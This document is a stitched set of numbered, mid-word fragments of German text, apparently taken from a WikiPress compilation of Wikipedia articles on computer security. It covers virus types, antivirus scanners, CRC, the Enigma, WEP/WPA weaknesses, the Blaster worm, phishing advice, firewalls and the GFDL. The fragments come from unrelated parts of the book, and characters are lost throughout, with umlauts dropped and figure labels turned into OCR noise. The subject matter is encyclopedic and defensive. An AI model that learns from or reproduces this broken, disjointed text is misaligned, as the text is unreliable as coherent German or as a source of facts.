250. en das eine Programm die Virensignaturen des anderen auf der Festplatte oder im Arbeitsspeicher als Virus erkennt bzw schon gesicherte Virendateien im so genannten Quarant ne Ordner des anderen Programmes findet Auch ein On Access Scanner kann deshalb bei einem zus tzlich gestarteten On Demand Scanvorgang eines anderen Virensuchprogrammes im Konkurrenzprodukt also f lschlich ein oder mehrere Viren finden Grunds tzlich sollte gelegentlich aber regelm ig der gesamte PC on demand auf Viren untersucht werden da mit Hilfe neuer Virensigna turen alte fr her nicht erkannte Virendateien entdeckt werden k nnen und dar ber hinaus auch die Wachtermodule ein und desselben Her stellers manchmal anders suchen und erkennen als der zugeh rige On Demand Scanner 28 Computervirus Computervirentypen Bootviren Bootviren z hlen zu den ltesten Computerviren Diese Vi ren waren bis 1995 eine sehr verbreitete Form von Viren Ein Bootsektor virus infiziert den Bootsektor von Disketten und Festplattenpartitionen und oder den Master Boot Record MBR einer Festplatte Der Bootsektor ist der erste physische Teil einer Diskette oder einer Festplattenpartition Festplatten haben au erdem einen so genannten Master Boot Record Dieser liegt wie der Bootsektor von Disketten ganz am Anfang des Datentr gers Bootsektoren und MBR enthalten mit den so genannten Boot Loadern die Software die von einem Rechner direkt nach dessen Start au
251. en ist Es ist deshalb oft notwendig anstelle eines einfachen Pr fsum menverfahrens kryptografisch st rkere Algorithmen wie Einweg Hash Algorithmen z B Message Digests zu benutzen Diese stellen weiterhin die Grundlage elektronischer Unterschriften dar Quelle http de wikipedia org wiki Pr fsumme Historie 13 8 03 Angelegt von Diddi danach bearbeitet von den Hauptautoren Diddi RokerHRO Robot Anton Jonelo Dominik witte Ichdertom ChristophDemmer Mathias Schindler Steven Malkovich anonym 12 1 06 1 2 06 WikiPress Redaktion 258 Zyklische Redundanzpr fung Zyklische Redundanzpr fung Die zyklische Redundanzpr fung engl cyclic redundancy check daher meist CRC selten ZRP ist ein Verfahren bzw eine bestimmte Klasse von Verfahren aus der Informationstechnik zur Bestimmung eines Pr fwerts f r Daten z B Daten bertragung in Rechnernetzen oder eine Datei um Fehler bei der bertragung oder Duplizierung von Daten erkennen zu k nnen Vor Beginn der bertragung bzw Kopie eines Blocks der Daten wird ein CRC Wert berechnet Nach Abschluss der Transaktion wird der CRC Wert erneut berechnet Anschlie end werden diese beiden Pr fwerte ver glichen CRC ist so ausgelegt dass Fehler bei der bertragung der Daten wie sie beispielsweise durch Rauschen auf der Leitung verursacht werden k nnten fast immer entdeckt werden CRC Werte k nnen jedoch nicht die Integrit t der Daten best tigen D h es ist verh
252. en sogar das gezielte Herunterladen und Installieren nur derjenigen Updates die sicherheitskritische Probleme be heben Dazu gibt es auch die M glichkeit die Service Packs und Hotfi xes f r Windows 2000 und Windows XP via Offline update einzuspielen Diese Offline updates sind besonders bei neuen PCs zu empfehlen da an dernfalls der PC bereits beim ersten Verbinden mit dem Internet infiziert werden k nnte Die eingebauten Schutzfunktionen des Betriebssystems sollten ausge nutzt werden Dazu z hlt insbesondere nicht als Administrator mit allen Rechten sondern als Nutzer mit eingeschr nkten Rechten zu arbeiten da dieser keine Software systemweit installieren darf Das automatische ffnen von Dateien aus dem Internet sowie das au tomatische Ausblenden von bekannten Dateianh ngen sollte deaktiviert werden um nicht versehentlich Dateien auszuf hren die man sonst als getarnten Sch dling erkennen w rde Auch durch die Autostartfunktion f r CD ROMs und DVD ROMs k nnen Programme bereits beim Einle gen eines solchen Datentr gers ausgef hrt und damit ein System infiziert werden Es empfiehlt sich die auf den meisten Privatrechnern vorinstallierte Software von Microsoft zu meiden oder sicherer zu konfigurieren da sie meist so konfiguriert sind dass sie f r den Anwender den h chsten Kom fort und nicht die h chste Sicherheit bieten Auch bieten sie durch ihren extrem hohen Verbreitungsgrad eine gro e Angriffsfl che Vor allem In
253. en zun chst drei ab 1939 f nf unterschiedliche Walzen zur Verf gung die mit r mischen Zahlen I I HI IV und V durchnummeriert waren Der Benutzer w hlte nach Vorgabe einer ge heimen Schl sseltabelle die f r jeden Tag wechselnde Einstellungen vor 299 Kryptografie sah drei der f nf Walzen aus und setzte diese nach der im Tagesschl ssel unter der berschrift Walzenlage vorgeschriebenen Anordnung ein Beispiel Walzenlage I IV II bedeutet Walze I ist links als langsamer Rotor Walze IV in der Mitte und Walze II rechts als schneller Rotor einzusetzen Kryptografische St rken Als die Enigma im Jahre 1918 durch Scherbius zum Patent angemeldet wurde also noch w hrend der Zeit des Ersten Weltkriegs war sie eine kryptografisch u erst starke Maschine und durfte zu Recht als unknack bar bezeichnet werden Innovativ war im Gegensatz zu den damals noch gebr uchlichen manuellen Verschl sselungsverfahren beispielsweise ADFGX eine maschinelle Verschl sselung einzuf hren Sie war durch die damals allein blichen manuellen haupts chlich linguistisch gest tz ten Enzifferungsmethoden unangreifbar und blieb es auch noch bis in die 1930er Jahre also mehr als zehn Jahre lang Die kryptografischen St rken der Enigma sind im Wesentlichen durch den rotierenden Walzensatz gegeben Durch die Drehung der Walzen wird erreicht dass jeder Buchstabe des Textes mit einem neuen Alphabet verschl sselt wird polyalphabet
254. enden Seite verdeutlichen Kodierung und Dekodierung Bei der Authentifizierung unterscheidet man zwei Verfahren Open System Authentication Die Open System Authentication ist die Standard Authentifizierung Dabei werden alle Clients f r das WLAN freigeschaltet und es findet praktisch keine weitere Authentifizierung mehr statt 248 Wired Equivalent Privacy Ciphertext Nachricht Ciphertext Nachricht Abb 27 WEP Entschl sselung Shared Key Authentication ae Die Shared Key Authenticati b 19 Aothetifasrns Callne Challenge on ist die sichere Variante Die i Ges Initiator esponder Authentifizierung erfolgt dabei er p ber ein Challenge Response Verfahren mit einem geheimen Schl ssel Abb 28 Bild WEPPNG Die vier Nachrichten der WEP Authentifizierung stellen die Zugriffsbe rechtigung des Client sicher Das WEP Datenpaket Ein WEP Datenpaket besteht aus den eigentlichen Nutzdaten einer 32 Bit Priifsumme dieser Nutzdaten Integrity Check Value ICV mittels CRC und 249 WLAN einem unverschl sselten 24 Bit Initialisierungsvektor IV der den WEP Schl ssel zum Gesamtschl ssel mit 64 Bit 128 Bit oder 256 Bit macht Daten IVC wv Verschl sselte Daten WEP Datenpaket WEP Gesamtpaket Das eigentliche WEP Datenpaket besteht aus den Daten und der 32 Bit lan gen Pr fsumme Dieses wird mit der IV WEP Schl sselkombination ver schliisselt und dem Ga
255. enprogramme zu sch tzen Im Jahr 1992 ver ffentlichte ein Virenschreiber namens Dark Avenger den ersten polymorphen Programmgenerator MTE Damit konnten sich auch ein fachste Viren leicht vor einer Erkennung sch tzen Einige der damaligen Hersteller von Antiviren Software konnten dieses Problem nicht l sen und stoppten die Entwicklung ihres Programms 1992 l ste das Michelangelo Virus eine enorme Medienhysterie aus Mit ihm wurde die Existenz der Viren auch in der breiten ffentlichkeit bekannt In diesen Jahren wurden auch immer wieder neue Techniken in Viren entdeckt wie zum Beispiel die gleichzeitige Infektion von Dateien und Bootsektor OBJ Dateien oder Quellcode Dateien Auch wurde 1992 mit Win Vir_1_4 das erste Computervirus f r das Betriebssystem Microsoft Windows 3 11 registriert Dieses Proof Of Concept Virus wurde nie in freier Wildbahn entdeckt 41 Viren W rmer Trojaner Viren wie ACG und OneHalf markieren das Ende der MS DOS Viren Bis heute z hlen sie zu den komplexesten Viren berhaupt Sie sind stark polymorph und enthalten auch Techniken wie Metamorphis mus Die ra der Viren f r 32 Bit Windows Betriebssysteme 1995 2002 Ab 1995 mit dem Erscheinen von Microsoft Windows 95 und dem st ndi gen Zuwachs an Benutzern wurden auch Viren f r dieses Betriebssystem und dessen obligate Programme wie Microsoft Office geschrieben 1995 erschien das erste Makrovirus f r Microsoft Word Da Dokumente fter als
256. enutzt werden k nnen wird in der Regel das Passwort vor dem Hashen um einen Zu fallswert erweitert Der Zufallswert wird neben dem Hash abgespeichert Quelle http de wikipedia org wiki W rterbuchangriff Historie 23 1 05 Anonym angelegt danach bearbeitet von den Hauptautoren Hendrik Brummermann 4Li3N51 Steven Malkovich AHZ Widewitt TorstenHendrich Stern anonym 12 1 06 1 2 06 WikiPress Redaktion Enigma Die Enigma ist eine elektro mechanische Ro tor Schl sselmaschine die im Zweiten Welt krieg im Funkverkehr des deutschen Milit rs verwendet wurde Das Wort Enigma kommt aus dem Griechischen und bedeutet Ratsel Abb 32 Markenschild der Enigma Prinzip Die Schliisselmaschine Enigma wurde vom deutschen Elektroingenieur Arthur Scherbius 1878 1929 entwickelt der hierzu am 23 Februar 1918 ein Patent DRP 416219 anmeldete Zur Fertigung der Enigma wurde am 9 Juli 1923 die Chiffriermaschinen Aktiengesellschaft in Berlin gegriindet Die Maschine war zun chst als ziviles Chiffriersystem konzipiert und wurde kommerziell auf Messen zum Verkauf angeboten Gegen Ende der 295 Kryptografie 1920er Jahre zeigten milit rische Stellen verst rkt Interesse so dass die Maschine bald darauf vom zivi len Markt verschwand Im Laufe der Zeit bis zum Kriegs ende 1945 und noch dar ber hi naus kamen viele verschiedene Modelle und Varianten der Enig ma zum Einsatz Die wohl ver breitetste ist die Enigma I sp
257. er Bekannte Beispiele sind auch die angebliche M glichkeit Teile der Rundfunkgeb hren von der GEZ zur ckerstatten zu lassen sowie die Bonsai Katzen oder unter muslimischen Jugendlichen das Rattenm d chen Cursed Girl Auch Kettenbriefe die per E Mail weitergeleitet werden k nnen zu den Hoaxes gez hlt werden denn hier existiert selten ein realer Hintergrund der die Verbreitung rechtfertigen w rde Die neueste Variante sind sinnlose Kettenlinks Die betroffenen Web seiten enthalten kaum verwertbare Informationen aber stets einen Link zu einer anderen Seite die hnlich aufgebaut ist Die Surfer hangeln sich so von Seite zu Seite ohne die eigentlich gesuchte Information zu finden Ein typischer Vertreter dieser Art von Hoax ist in etlichen Blogs zu finden 169 Sonstige Themen Deren starke interne Verlinkung sorgt inzwischen daf r dass eine Goog le Suche nach dem besten Blondinenwitz aller Zeiten kaum noch Witze daf r aber umso mehr Blogeintr ge zu Tage f rdert Im erweiterten Sinn kann ein Hoax auch als Computervirus betrach tet werden der sich durch Social Engineering fortpflanzt Insbesondere gab es auch schon Hoaxes mit Schadroutinen die den Benutzer aufforder ten bestimmte Dateien zu l schen da es sich um Viren handle Beispiel SULFNBK EXE und JDBGMGR exe der Teddyb renvirus Da es sich je doch um eine notwendige Systemdatei unter Windows handelt sch digt der Benutzer sein eigenes System W
258. er auch W32 Lovsan und MSBlast ist ein Computerwurm der sich durch Ausnutzung einer Sicherheitsl cke in der RPC Schnittstelle von Microsoft Windows verbreitet Der Wurm verbreitet sich ausschlie lich ber die Betriebssysteme Windows 2000 XP und Windows Server 2003 ber den TCP Port 135 Das Distributed Computing Environment DCE das aufeiner Vielzahl verschiedener Betriebssysteme installiert sein kann verwendet auch RPCs ber Port 135 In Folge einer Schwachstelle in der Implementierung einiger Hersteller kann auf manchen Plattformen der DCE Dienst zum Absturz gebracht werden Der Wurm kann allerdings bei einem Angriff nicht erkennen ob das Angriffsziel bereits befallen ist Er bremst sich deshalb in der Verbreitung selbst aus da er auch bereits befallene Windows Rechner zum Absturz bringt Erst wenn der Angriff erfolgreich war wird berpr ft ob die Datei msblast exe bereits auf der Festplatte vorhanden ist Der Wurm sollte am 16 August 2003 einen Distributed Denial of Service Angriff auf die Updateseiten der Firma Microsoft durchf hren auf denen auch der Patch f r die Sicherheitsl cke lagert Mutationen Mittlerweile tritt der Wurm auch in zahlreichen Mutationen auf Eine die ser Mutationen kombiniert den Wurm mit einem Trojanischen Pferd Diese Entwicklung stellt mittlerweile auch eine direkte Bedrohung f r die Systemsicherheit der Anwender dar da der Wurm sich nicht mehr auf die Verbreitung beschr nkt sondern d
259. er Regel nur wenige Sekunden sp ter eine Best tigungsmail In dieser ist ein Link zur SpamCop Website enthalten dem man mit dem Browser folgt und dort nochmals best tigt dass es sich bei der Mail tats chlich um Spam handelt Alles Weitere wird von SpamCop bernommen an wen die Beschwerden letztend lich verschickt werden l sst sich ebenfalls der letztgenannten Webseite entnehmen Verbraucherzentrale Am 01 Juli 2005 startete das vom Bundesministe rium f r Verbraucherschutz Ern hrung und Landwirtschaft BMVEL zusammen mit der Verbraucherzentrale Bundesverband e V VZBV ein gesetzte Projekt einer Beschwerdestelle zur Bek mpfung von Spam Unter beschwerdestelle spam vzbv de k nnen Verbraucher dem VZBV per Mail unerw nscht eingetroffene Spams bermitteln Der VZBV berpr ft diese F lle und wird in geeigneten F llen juristisch gegen Spam Versender und deren Auftraggeber vorgehen Wichtig ist dabei nur dass man den 201 Sonstige Themen erweiterten Header der Spam Mail mitschickt Da diese Angaben f r eine etwaige Rechtsverfolgung notwendig sind k nnen Mails ohne gesicherte Header Zeilen leider nicht bearbeitet werden Der VZBV arbeitet mit anderen Verbraucherzentralen auf der ganzen Welt zusammen Er hat sich zum Ziel gesetzt Spam mit allen juristischen Mitteln unprofitabel zu machen Der Service ist kostenlos man braucht sich nicht zu registrieren und ist nur f r Privatpersonen gedacht Die Sache zeigt Wir
260. er einen MD5 Hash gesichert wird und mit dessen Hilfe man die generierten Schl ssel auf ihre Richtigkeit ber pr fen kann Seit dem 28 April 2004 existiert f r einen m glichen W rterbuchan griff ein Proof of Concept der im MacOSX Programm KisMAC imple mentiert wurde Seit November 2004 existiert auch das Programm WPA Cracker diesmal f r Linux welches einen Offline W rterbuchangriff an hand mitprotokollierter Pakete durchf hrt und mittlerweile im Quelltext vorliegt F r einen Brute Force oder Dictionary Angriff auf den aufge zeichneten 4 Way Handshake des TKIP kann cowpatty verwendet wer den Quelle http de wikipedia org wiki Wi Fi_Protected_Access Historie 6 3 04 Angelegt von Chrizz danach bearbeitet von den Hauptautoren Chrizz Ulf Wetzker M rossberg Neo23x0 Eddia Klaus Jesper Nightwish62 Saemon Mario Mlynek FlaBot Dake Cat Fgrassmann anonym 12 1 06 1 2 06 WikiPress Redaktion 252 Temporal Key Integrity Protocol IEEE 802 11i Der IEEE Standard 802 11i ist ein im Juni 2004 ratifiziertes Sicherheits protokoll f r Wireless LAN kabellose Datennetzwerke Dieser Standard soll das bislang l chrige Verschl sselungsverfahren Wired Equivalent Privacy WEP entscheidend verbessern Zwischenzeitlich wurde ein Teil des Protokolls unter der Bezeichnung WPA Wi Fi Protected Access vorweggenommen WPA erlaubt eine fes tere Verschl sselung durch das Temporal Key Integrity Protocol TKIP Dur
261. er einzuschr n ken zu erm glichen Digital Rights Management Entschl sselung in der Kryptologie Im engeren Sinne bzw in der Wissenschaft der Kryptologie nennt man die Entschl sselung den Vorgang bei dem ein vorher durch Verschl sselung kodierter Text oft Geheimtext genannt mit Hilfe eines Entschl sselungs verfahrens in einen Klartext zur ckgewandelt wird Ist dieses Verfahren computertauglich kann es als Algorithmus bezeichnet werden Kryp toanalyse Entschl sselung in der Arch ologie Der Begriff Entschl sselung wird auch in der Arch ologie f r die Deu tung bzw Ubersetzung unbekannter Schriften und Zeichen verwendet Entzifferung Quelle http de wikipedia org wiki Entschliisselung Historie 6 4 04 Angelegt von Priwo danach bearbeitet von den Hauptautoren PhilipErd s Sicherlich Hafenbar Stern Priwo Steven Malkovich Schizoschaf Wst anonym 12 1 06 1 2 06 WikiPress Redaktion Kennwort Ein Kennwort oder auch Passwort ist ein allgemeines Mittel zur Authen tifizierung eines Benutzers nicht ausschlie lich ein Mensch innerhalb eines Systems der sich durch eine eindeutige Information das Kennwort dem System gegen ber ausweist Die Authentizit t des Benutzers bleibt daher nur gewahrt wenn er das Passwort geheim h lt 286 Kennwort Historisches Ein Kennwort auch Losung Losungswort oder Parole war im Milit r ur spr nglich ein als Erkennungszeichen dienendes Wort um bei Dunke
262. er letztlich nur die Gerichte oder klarere revidierte Gesetzestexte bringen k nnen Das Bundesverfassungsgericht hat eine Verfassungsbeschwerde die sich gegen die Neuregelungen des UrhG richtete nicht zur Entscheidung angenommen und den Beschwerdef hrer auf den Rechtsweg verwiesen Beschluss vom 25 07 05 Az 1 BvR 2182 04 Im Entwurf zum neuen Urheberrechtsgesetzes URG der Schweiz wird festgehalten dass die Umgehung eines Kopierschutzes strafbar sein soll falls sie vors tzlich und unrechtm ssig geschehe Da die Erstellung von Privatkopien erlaubt bzw rechtm ig bleibt brauchen die Hersteller von Privatkopien nichts zu bef rchten Ebenso wird es straflos bleiben Soft ware zur Kopierschutz Umgehung zu erstellen und zu verbreiten falls sie haupts chlich dem rechtm igen Erstellen von Kopien dient In den Erl u terungen zum Entwurf wird offen davon gesprochen dass Kopierschutz ma nahmen eine Selbsthilfe der Urheber darstelle Ebenso soll gem neuem URG eine Steuer auf den Kauf leerer Datentr ger erhoben werden damit die Urheber auch an Privatkopien verdienen Einerseits werden Kopierschutzma nahmen strafrechtlich gesch tzt und andrerseits erlei det wer das Recht auf das Erstellen von Privatkopien wahrnimmt durch die Verg tung finanziellen Schaden In sterreich wurde in der Neufassung des Urheberrechts von 2003 ebenfalls eine nebul se Regelung der Kopie zum privaten Gebrauch 42 UrhG eingef hr
263. er von UBE UCE k nnen sofern der Mail Client des Emp f ngers eine entsprechende Sicherheitsl cke aufweist durch Einbau eines Web Bugs in die E Mail ermitteln 163 Sonstige Themen ob eine E Mail Adresse g ltig ist dass und wann die E Mail gelesen wurde welchen Browser und welches Betriebssystem verwendet wird welche IP Adresse der Client hat damit dessen ISP auch Provider und m glicherweise sogar den Wohnort des Benutzers Bei der Ausnutzung von Cross Site Scripting Schwachstellen wird h u fig ein hnliches Verfahren verwendet um die Session ID des Opfers an den Server des Angreifers zu bertragen Gegenmittel Wird eine E Mail oder Webseite offline gelesen kann die Grafik des Web Bugs nicht vom Server geladen werden und dort also auch nicht registriert werden Man kann auch einfach ein Mailprogramm benutzen das keine HTML E Mails unterstiitzt bzw sie nicht anzeigt Quelle http de wikipedia org wiki Web Bug Historie 19 10 03 Angelegt von Stefan Kiihn danach bearbeitet von den Hauptautoren Stefan K hn Nerd Hendrik Brummermann Tilo Weede TomK32 Diddi Steven Malkovich MichaelDiederich Gunther ChristophDemmer anonym 12 1 06 1 2 06 WikiPress Redaktion HTTP Cookie Ein HTTP Cookie auch Browser Cookie genannt engl Platzchen Keks bezeichnet Informationen die ein Webserver zu einem Brow ser sendet die dann der Browser wiederum bei sp teren Zugriffen auf denselben Webserver zur
264. eradressen k nnen gef lscht werden und sind nicht vertrauensw rdig Geben Sie die URL zum Onlinebanking immer von Hand in die Adress zeile des Browsers ein oder benutzen Sie im Browser gespeicherte Le sezeichen die Sie zuvor sorgf ltig angelegt haben Vor der Nutzung si cherheitsrelevanter Dienste sollten keine weiteren Browserfenster oder Tabs ge ffnet sein Nutzen Sie alternative Browser wie den aktuellen Firefox von Mozillamit der Zusatzerweiterung Spoofstick Diese Erweiterung zeigt den Namen der Internetadresse an auf der man sich momentan wirklich befindet Pr fen Sie nach M glichkeit die Verschl sselung der Webseite insbe sondere den elektronischen Fingerabdruck Fingerprint des Zertifi kats Nur so k nnen Sie zweifelsfrei sicherstellen dass Sie tats chlich mit dem Server des Anbieters z B Bankrechner verbunden sind Der Dienstleister stellt Ihnen auf der Webseite oder auf Anfrage die n ti gen Informationen zum Abgleich zur Verf gung Seien Sie misstrauisch wenn Sie unaufgefordert auf sicherheitsrelevan te Bereiche angesprochen werden Fragen Sie bei den Dienstanbietern nach wenn Sie unsicher sind Derartige R ckfragen liefern den Betrei bern der betroffenen Dienste meist erst den Hinweis dass eine Phis hing Attacke gegen ihre Kunden l uft Eine phishingresistente M glichkeit Onlinebankingtransaktionen durchzuf hren besteht darin das signaturgest tze HBCI Verfahren 233 Angriffe mit Chipkarte zu nutz
265. erde das mensch liche Vertrauen oder die Unerfahrenheit auszunutzten man auch auf die se technische Weise nur das bei der Installation von Software aufgebrachte Vertrauen auf eine andere Instanz verlagert Bekannte Backdoorprogramme Bekannte Backdoorprogramme die ber Trojanische Pferde verbreitet wurden deshalb oft auch selber als Trojaner Trojanische Pferde bezeich net Back Orifice Netbus SubSeven Quelle http de wikipedia org wiki Trojanisches_Pferd_ Computerprogramm Historie 14 4 04 Angelegt von Stefan K hn danach bearbeitet von den Hauptautoren Hendrik vm Nerdi Stefan K hn Blubbalutsch WikiMax MichaelDiederich Schnargel Liquidat Johannes Bretscher Steven Malkovich Fragment Mario23 MiB anonym 12 1 06 1 2 06 WikiPress Redaktion 75 Software Antivirenprogramm Ein Antivirenprogramm auch Virenscanner oder Virenschutz genannt ist eine Software die bekannte Computerviren Computerwiirmer und Trojanische Pferde aufsp rt blockiert und gegebenenfalls beseitigt Arbeitsweise Um sch dliche Software zu erkennen hat jeder Virenscanner eine Liste mit Mustern aller ihm bekannten Viren und anderer sch dlicher Software Virensignaturen oder auch Pattern genannt mit der er die zu berpr fende Software vergleicht Stimmt eine Datei oder ein Teil einer Datei mit einem Muster aus der Liste berein werden Schritte zur Neutralisierung und gegebenenfalls zur Reparatur der infizierten Datei sow
266. ereits abgeschlossen hat Personal Firewalls Personal Firewalls oder auch Desktop Firewalls sind Programme die lokal auf dem zu sch tzenden Rechner installiert sind Somit ist diese Art von Firewall nicht daf r gedacht den Verkehr zwischen mehreren Netzen zu kontrollieren sondern bestimmten Verkehr nicht in den lo kalen Rechner hineinzulassen oder hinauszulassen Die Installation auf dem zu sch tzenden Rechner erlaubt es auch anwendungsspezifisch zu filtern Viele Produkte legen ihren Schwerpunkt auf einfache Konfigu ration Die Schutzwirkung von Personal Firewalls ist allerdings eher gering Beispiel Ein einfaches Konzept soll diese trockene Materie verdeutlichen Eine Firma m chte ihre Arbeitsplatzrechner ins Internet bringen Man ent scheidet sich f r eine Firewall und aufgrund der Viren W rmergefahr m chte man nur die Verbindungen zu einem Mail Server aufbauen Da mit auch eine Recherche im Internet m glich ist soll ein PC ber einen Proxy Zugriff zu Webseiten erhalten Der Surf Rechner wird zus tzlich dadurch gesch tzt dass ActiveX aus den angeforderten HTML Seiten aus Sicherheitsgr nden herausgefiltert wird Sonstige Zugriffe von au en auf das Firmennetz sollen einfach geblockt werden 92 Firewall Firewall Mallprovisar AI Arbeitsplatrechner 1110002 as Unterhaltung Asbeltsplaterechner 11110003 a ii Internat intranet Surrachner 110 001 Nacnnehen Netzwerkmertace
267. eren aller oder zumindest eines erheblichen Teils der in Frage kommenden Varianten beruht Informatik F r viele Probleme gibt es in der Informatik keine effizienten Algorith men Der nat rlichste und einfachste Ansatz zur algorithmischen L sung eines Problems besteht dann darin einfach alle potenziellen L sungen durchzuprobieren Diese Methode nennt man Brute Force Bekannt ist diese Methode vor allem im Bereich der Computersicher heit Klassisches Anwendungsbeispiel f r Brute Force Attacken ist das Knacken von verschl sselten Passwortlisten welche in der Regel aus Hash Werten bestehen bei welchen die Verschl sselung nicht mehr r ckg ngig gemacht werden kann Brute Force bedeutet hier dann simp les Ausprobieren verschiedener Passwortm glichkeiten Versuche werden 291 Kryptografie generiert auf die gleiche Weise verschl sselt und bei Gleichheit der bei den Hashes ist das Passwort gefunden Dieses Verfahren ist also sehr re chenintensiv und lohnt sich nur in den wenigsten F llen solange keine zu schwachen Kennw rter vergeben wurden Daher ist es meist die zweite Wahl nach einem W rterbuchangriff engl dictionary attack Des Weiteren gibt es Software um Brute Force Angriffe via Internet auf Dienste wie FTP durchzuf hren Der vielseitigen Anwendbarkeit insbesondere gegen Internetdienste steht der immense Zeitaufwand gegen ber weshalb mit zunehmender Re chenleistung immer l ngere Hash Werte f r einen a
268. erh lt man analog 24 23 2 276 M g lichkeiten Allgemein gibt es 26 2n 2 26 2n 1 2 M glichkeiten f r die n te Steckverbindung Nummer der M glichkeiten f r M glichkeiten f r Steckverbindung erste Seite zweite Seite Steckverbindung 0 1 1 1 1 26 25 325 2 24 23 276 3 22 21 231 4 20 19 190 5 18 17 153 6 16 15 120 7 14 13 91 8 12 11 66 9 10 9 45 10 8 7 28 11 6 5 15 12 4 3 6 13 2 1 1 Die Gesamtzahl der m glichen Steckkombinationen bei Verwendung von mehreren Steckern ergibt sich aus dem Produkt der M glichkeiten fiir die einzelnen Steckverbindungen Da aber auch hier die Reihenfolge der Durchf hrung keine Rolle spielt es ist kryptografisch gleichwertig wenn beispielsweise zuerst A mit X gesteckert wird und danach B mit Y oder umgekehrt zuerst B mit Y und dann A mit X d rfen die entsprechenden F lle nicht als Schl sselkombinationen ber cksichtigt werden Dies sind bei zwei Steckverbindungen genau die H lfte der F lle Das vorher ermit telte Produkt ist also durch 2 zu dividieren Bei drei Steckerverbindungen 302 Enigma gibt es 6 m gliche Reihenfolgen f r die Durchf hrung der Steckungen die alle sechs kryptografisch gleichwertig sind Das Produkt ist also durch 6 zu dividieren Im allgemeinen Fall bei n Steckverbindungen ist das Produkt der vorher ermittelten M glichkeiten durch n zu dividieren Es ergibt sich die folgende Anzahl der M glichkeiten f r genau n Steckver bindungen 1 26
269. eriertes HTML PostScript oder PDF das von irgendeinem Textverarbeitungsprogramm nur zu Ausgabezwecken erzeugt wird Mit Titelseite wird in einem gedruckten Buch die eigentliche Titelseite bezeichnet sowie die darauf folgenden Seiten die all das in lesbarer Form enthalten sollen was dieser Lizenz gem auf der Titelseite erscheinen muss F r Werke in Formaten die keine Titelseite als solche haben ist mit Titelseite der Text gemeint der in der N he der auff lligsten Abbildung des Werktitels steht und dem Haupttext vorausgeht Ein XYZ berschriebener Abschnitt ist eine eigens genannte Untereinheit des Dokuments deren Titel entweder genau XYZ ist oder XYZ in Klammern hinter einem Text enth lt der XYZ in eine andere Sprache bersetzt Hier steht XYZ f r einen bestimmten Abschnittsnamen siehe weiter unten etwa Danksagungen Widmungen Empfehlungen oder Historie Den Titel eines solchen Abschnitts beim Ver ndern des Dokuments zu erhalten bedeutet dass er entsprechend dieser Definition ein XYZ berschriebener Abschnitt bleibt Das Dokument kann neben dem Hinweis der besagt dass diese Lizenz auf das Dokument angewendet wird Haftungsausschl sse enthalten Diese Haftungsausschl sse werden betrachtet als seien sie als Hinweise in dieser Lizenz enthalten allerdings nur um Garantien auszuschlie en Jede anderweitige Folgerung aus diesen Haftungsausschl ssen ist ung ltig und wirkt sich nicht au
270. ern bestimmter ICMP Typen oder das Zur ckweisen von Paketen mit einer Fehlermel dung Anwender k nnen selbst Module schreiben um das Programm zu erweitern Viele Linux Distributionen bringen eigene Werkzeuge zur Einrichtung des Paketfilters mit Die SuSEfirewall beispielsweise ist eine Skriptsammlung f r netfilter Sie kann mit dem grafischen Installations und Konfigurationswerkzeug YaST Yet another Setup Tool eingerichtet werden Die Personal Firewall TuxGuardian beruht auf den M glichkei ten des Linux Kernels 2 6 10 TuxGuardian erlaubt Anwendungskontrolle und kann mit dem Benutzer ber Dialogfenster interagieren 105 Software Der grafische Regelgenerator Firewall Builder Fwbuilder l uft auf meh reren Betriebssystemen und unterst tzt verschiedene Paketfilter Obwohl Firewall Builder vorwiegend f r den professionellen Einsatz gedacht ist existieren Anleitungen HowIos zum Einrichten einer Personal Firewall mithilfe dieses Programms Zur Protokollierung kommt unter unixoiden Betriebssystemen meist syslog zum Einsatz Die meisten Syslog Implemen tierungen k nnen auch ber Unix Domain Sockets kommunizieren wenn sie lokale Logfiles anlegen Ein beliebtes Intrusion Detection System ist Snort In eine Sandbox lassen sich Anwendungen die f r eine Kompromit tierung anfallig sind mithilfe von chroot oder jails sperren Als Content Fil ter lassen sich der Web Cache Proxy Squid oder DansGuardian einsetzen Literatur YEO Lisa
271. ern unter den Bedingungen der GNU Free Documentation License Version 1 2 oder jeder sp teren Version die von der Free Software Foundation ver ffentlicht wird es gibt keine unver nderlichen Abschnitte keinen vorderen Umschlagtext und keinen hinteren Umschlagtext Eine Kopie der Lizenz ist unter dem Titel GNU Free Documentation License enthalten Wenn Sie unver nderliche Abschnitte vordere und hintere Umschlagtexte haben ersetzen Sie die Zeile with Texts durch die folgende with the Invariant Sections being LIST THEIR TITLES with the Front Cover Texts being LIST and with the Back Cover Texts being LIST Auf Deutsch Mit den unver nderlichen Abschnitten und zwar LISTE DER TITEL mit den vorderen Umschlagtexten und zwar LISTE und den hinteren Umschlagtexten und zwar LISTE Wenn Sie unver nderliche Abschnitte haben aber keine Umschlagtexte oder irgendeine andere Kombination vorliegt fassen Sie die beiden Alternativen entsprechend Ihren Anforderungen zusammen Wenn Ihr Dokument nicht triviale Beispiele von Programmcode enth lt empfehlen wir diese Beispiele parallel unter einer freien Softwarelizenz Ihrer Wahl beispielsweise der GNU General Public License freizugeben um ihre Verwendung in freier Software zu gestatten Quelle http wiki wikipress de WikiPress GFDL_deutsch bersetzung Hugo Giese http www giese online de gnufdl de html Thomas Hafki Nicola Uther 335 Anhang Bildnachweis Alle Abb
272. erschl sselung seiner selbst ist dann er ffnet ihm diese Kenntnis Abk rzungen und er muss nicht mehr m hsam jeden einzelnen Fall abarbeiten wie an folgendem Beispiel illus triert wird Ein seit Jahrhunderten bekanntes und bew hrtes Entzifferungsverfah ren ist die Methode des Wahrscheinlichen Worts Hierbei err t vermu tet oder wei der Angreifer dass im Text eine bestimmte Phrase engl crib franz mot probable auftritt beispielsweise OBERKOMMANDODER WEHRMACHT Liegt dem Angreifer zum Beispiel ein mit der Enigma verschl sseltes Geheimtextfragment wie das folgende vor so kann er ganz leicht ermitteln an welcher Stelle im Text das vermutete Wahrscheinliche Wort sich nicht befinden kann indem er f r jede m gliche Lage pr ft ob ein Zeichen in sich selbst verschl sselt w rde was wie er von der Enigma wei unm glich ist Dazu schreibt er das Wahrscheinliche Wort in den verschiedenen Lagen unter den Geheimtext und pr ft auf Kollisionen die im Beispiel rechts durch Fettdruck hervorgehoben sind Die Anzahl der durch Kollisionen auszuschlie enden Lagen l sst sich brigens nach folgender berlegung absch tzen Bei einem Wahrschein lichen Wort der L nge 1 also nur ein einzelner wahrscheinlicher Buchsta be ist die Wahrscheinlichkeit f r eine Kollision 1 26 Folglich die Wahr scheinlichkeit f r keine Kollision 1 1 26 Bei einem Wahrscheinlichen Wort wie oben mit der L nge 24 ist dann die 